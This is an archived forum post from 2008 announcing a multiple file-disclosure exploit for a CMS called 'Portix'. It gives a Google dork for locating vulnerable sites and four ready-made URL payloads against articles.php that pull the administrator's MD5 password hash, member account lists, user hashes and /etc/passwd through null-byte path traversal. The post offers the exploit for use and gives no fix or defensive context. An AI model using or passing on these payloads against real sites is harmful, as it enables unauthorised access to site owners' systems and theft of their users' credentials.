CMS "Portix" => files disclosure (multiple)

Moderator: Mod

CMS "Portix" => files disclosure (multiple)

Postby kmkz » Sat Apr 12, 2008 3:48 pm

------------ /*Portix CMS - Remote expl0it Security Vulnerability*/--------------
¤Author: kmkZ ©
¤Bugs: Multiple Files Disclosure
¤Special thanks to: LeXxX for Files Disclosure exploitation
¤Version Affected : All (CMS) Portix Versions !
[~]Dork: allinurl:"/articles.php?l="
-------------------------------------------------------------------------


Exploit :

[site.com]/articles.php?l=/data/membres/admin.inf.dat --> Get Admin Md5 Hash

[site.com]/articles.php?l=/data/membres --> Show members accounts

[site.com]/articles.php?l=/data/membres/users.inf.dat --> Get Users Md5 Hashes

[site.com]/articles.php?l=/etc/passwd%00 --> often shadowed but , why not ? ^^ (maybe Get Admin & Modérator Md5 Hashes


----------------------
| Discovered By |
| kmkZ © |
----------------------
User avatar
kmkz
Projets
 
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse

Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 1 guest

cron